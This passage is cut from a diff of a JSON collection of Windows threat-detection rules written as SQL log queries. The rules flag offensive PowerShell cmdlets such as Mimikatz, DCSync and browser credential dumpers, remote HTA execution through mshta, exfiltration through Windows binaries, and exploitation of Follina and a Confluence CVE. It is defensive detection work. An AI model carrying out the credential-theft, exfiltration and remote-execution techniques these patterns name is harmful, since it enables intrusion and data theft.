LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\')) OR (ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates. 
All Rights Reserved%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostApplication LIKE '%' ESCAPE '\\' AND NOT ((HostApplication LIKE 'powershell%' ESCAPE '\\' OR HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\') OR ContextInfo LIKE '%Citrix\\\\ConfigSync\\\\ConfigSync.ps1%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_commandlets.yml" + "filename": "posh_pc_alternate_powershell_hosts.yml" }, { - "title": "Request A Single Ticket via PowerShell", - "id": "a861d835-af37-4930-bcd6-5b178bfb54df", + "title": "Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution", + "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", "status": "test", - "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", - "author": "frack113", + "description": "Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use by developers as part of NodeJS development with Visual Studio Tools" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 
'%\\\\Microsoft.NodejsTools.PressAnyKey.exe' ESCAPE '\\')" ], - "filename": "posh_ps_request_kerberos_ticket.yml" + "filename": "proc_creation_win_pressanykey_lolbin_execution.yml" }, { - "title": "Suspicious Get Local Groups Information - PowerShell", - "id": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", + "title": "Application Whitelisting Bypass via PresentationHost.exe", + "id": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", "status": "experimental", - "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "falsepositives": [ + "Legitimate \".xbap\" being executed via \"PresentationHost\"" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND CommandLine LIKE '%.xbap%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_lolbin_presentationhost.yml" + }, + { + "title": "Suspicious ConfigSecurityPolicy Execution", + "id": "1f0f6176-6482-4027-b151-00071af39d7e", + "status": "experimental", + "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", "author": "frack113", 
"tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.exfiltration", + "attack.t1567" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%get-localgroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Get-WMIObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Group%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%ConfigSecurityPolicy.exe%' ESCAPE '\\' OR Image LIKE '%\\\\ConfigSecurityPolicy.exe' ESCAPE '\\' OR OriginalFileName = 'ConfigSecurityPolicy.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_local_group_reco.yml" + "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml" }, { - "title": "Enumerate Credentials from Windows Credential Manager With PowerShell", - "id": "603c6630-5225-49c1-8047-26c964553e0e", + "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", + "id": "245f92e3-c4da-45f1-9070-bc552e06db11", "status": "test", - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", - "author": "frack113", + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": 
"medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%vaultcmd%' ESCAPE '\\' AND ScriptBlockText LIKE '%/listcreds:%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Web Credentials%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" ], - "filename": "posh_ps_enumerate_password_windows_credential_manager.yml" + "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" }, { - "title": "Potential In-Memory Execution Using Reflection.Assembly", - "id": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", + "title": "Potential Arbitrary File Download Using Office Application", + "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", "status": "experimental", - "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", - "author": "frack113", + "description": "Detects potential arbitrary file download using a Microsoft Office application", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], "falsepositives": [ - "Legitimate use of the library" + "Unknown" ], "level": "medium", "rule": 
[ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Reflection.Assembly]::load%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR Image LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\') OR OriginalFileName IN ('Excel.exe', 'POWERPNT.EXE', 'WinWord.exe')) AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" ], - "filename": "posh_ps_dotnet_assembly_from_file.yml" + "filename": "proc_creation_win_office_arbitrary_cli_download.yml" }, { - "title": "Suspicious Invoke-Item From Mount-DiskImage", - "id": "902cedee-0398-4e3a-8183-6f3a89773a96", + "title": "PUA - Adidnsdump Execution", + "id": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", "status": "test", - "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", + "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\nUsee to Query/modify DNS records for Active Directory integrated DNS via LDAP\n", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1553.005" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-Volume%' ESCAPE '\\' AND ScriptBlockText LIKE '%.DriveLetter%' ESCAPE '\\' AND ScriptBlockText LIKE 
'%invoke-item %' ESCAPE '\\' AND ScriptBlockText LIKE '%):\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%adidnsdump%' ESCAPE '\\')" ], - "filename": "posh_ps_run_from_mount_diskimage.yml" + "filename": "proc_creation_win_python_adidnsdump.yml" }, { - "title": "Potential Invoke-Mimikatz PowerShell Script", - "id": "189e3b02-82b2-4b90-9662-411eb64486d4", + "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", + "id": "b98d0db6-511d-45de-ad02-e82a98729620", "status": "experimental", - "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", - "author": "Tim Rauch", + "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.005" ], "falsepositives": [ - "Mimikatz can be useful for testing the security of networks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE 
'%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_potential_invoke_mimikatz.yml" + "filename": "proc_creation_win_mshta_http.yml" }, { - "title": "Potential AMSI Bypass Using NULL Bits - ScriptBlockLogging", - "id": "fa2559c8-1197-471d-9cdd-05a0273d4522", + "title": "Suspicious MSDT Parent Process", + "id": "7a74da6b-ea76-47db-92cc-874ad90df734", "status": "experimental", - "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockLogging LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR ScriptBlockLogging LIKE '%#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" ], - "filename": "posh_ps_amsi_null_bits_bypass.yml" + 
"filename": "proc_creation_win_msdt_susp_parent.yml" }, { - "title": "Windows PowerShell Upload Web Request", - "id": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", - "status": "experimental", - "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", - "author": "frack113", + "title": "Renamed MegaSync Execution", + "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "status": "test", + "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", + "author": "Sittikorn S", "tags": [ - "attack.exfiltration", - "attack.t1020" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate script" + "Software that illegally integrates MegaSync in a renamed form", + "Administrators that have renamed MegaSync" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\') AND ScriptBlockText LIKE '%-Method %' ESCAPE '\\' AND (ScriptBlockText LIKE '% Put %' ESCAPE '\\' OR ScriptBlockText LIKE '% Post %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'megasync.exe' AND NOT (Image LIKE '%\\\\megasync.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_upload.yml" + "filename": "proc_creation_win_renamed_megasync.yml" }, { - "title": "Change User Agents with WebRequest", - "id": "d4488827-73af-4f8d-9244-7b7662ef046e", + "title": "Suspicious Extrac32 Execution", + "id": "aa8e035d-7be4-48d3-a944-102aec04400d", "status": "experimental", - "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing 
traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", + "description": "Download or Copy file with Extrac32", "author": "frack113", "tags": [ "attack.command_and_control", - "attack.t1071.001" + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '%-UserAgent %' ESCAPE '\\')" - ], - "filename": "posh_ps_susp_invoke_webrequest_useragent.yml" - }, - { - "title": "Suspicious X509Enrollment - Ps Script", - "id": "504d63cb-0dba-4d02-8531-e72981aace2c", - "status": "experimental", - "description": "Detect use of X509Enrollment", - "author": "frack113", - "falsepositives": [ - "Legitimate administrative script" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR ScriptBlockText LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' OR Image LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR OriginalFileName = 'extrac32.exe') AND CommandLine LIKE 